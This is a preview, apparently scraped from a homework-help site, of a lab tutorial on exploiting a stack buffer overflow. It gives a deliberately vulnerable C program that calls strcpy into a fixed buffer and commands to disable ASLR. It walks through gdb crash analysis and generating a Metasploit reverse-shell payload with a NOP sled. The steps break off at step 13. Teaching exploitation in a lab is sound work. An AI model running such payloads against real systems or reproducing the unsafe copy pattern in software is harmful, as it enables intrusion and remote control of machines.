Simple.BOF.Tutorial

Simple.BOF.Tutorial - msfweb Step 7: Click on the buttons...

Info iconThis preview shows pages 1–3. Sign up to view the full content.

View Full Document Right Arrow Icon
This guide is thanks to the work done by Preddy ‐ RootShell Security Group http://www.exploiter5.com/all.php?id=44 Program: // vuln‐prog.c #include <stdlib.h> #include <stdio.h> #include <string.h> int bof(char *string) { char buffer [1024]; strcpy(buffer, string); return 1; } int main(int argc, char *argv[]) { bof(argv[1]); printf("Done. .\n"); return 1; } Step 0: Open a new konsole and start up netcat with the following command nc –l –p 9999 –vv Step 1: Complie the program that was stated above with the following command: gcc voln-prog.c –o vuln-prog Step 2: Disable the kernel protection by typing the following command in the konsole/terminal: echo 0 > /proc/sys/kernel/randomize_va_space
Background image of page 1

Info iconThis preview has intentionally blurred sections. Sign up to view the full version.

View Full DocumentRight Arrow Icon
Step 3: Start up gdb with the program loaded: gdb ./vuln-prog Step 4: Run the application with an input greater then 1024 bytes in gdb: (gdb) run `perl -e 'print "A"x1032'` Step 5: Look at the registers for EIP: (gdb) i r Step 6: Start up the Metasploit Web Interface in BackTrack v3
Background image of page 2
Background image of page 3
This is the end of the preview. Sign up to access the rest of the document.

Unformatted text preview: msfweb Step 7: Click on the buttons PAYLOADS and search for Linux Linux command shell, reverse . Find the Reverse shell for x86 architecture Step 8: Generate a new shell with the following options LPORT: 9999 LHOST: &lt;your backtrack ip addr&gt; Step 9: Copy the generated code and strip off the , newlines, and spaces Step 10: Note the size of bytes of the generated shellcode. Then take 1032 - 600 - 4 - &lt;size of shellcode&gt; = number of NOPs you need. Step 11: Run the following command to test if you are still generating an overflow run `perl -e print Ax600,\x90x&lt;#nops&gt;,&lt;shellcode&gt;,BBBB ` Step 12: You should see the EIP failed at \x42\x42\x42\x42. You need to find a NOP location to start executing your code. (gdb) x/2000xb $esp Step 13: Reverse the code address. i.e AABBCCDD \xDD\xCC\xBB\xAA and replace the previous BBBB code with the code location....
View Full Document

Page1 / 3

Simple.BOF.Tutorial - msfweb Step 7: Click on the buttons...

This preview shows document pages 1 - 3. Sign up to view the full document.

View Full Document Right Arrow Icon
Ask a homework question - tutors are online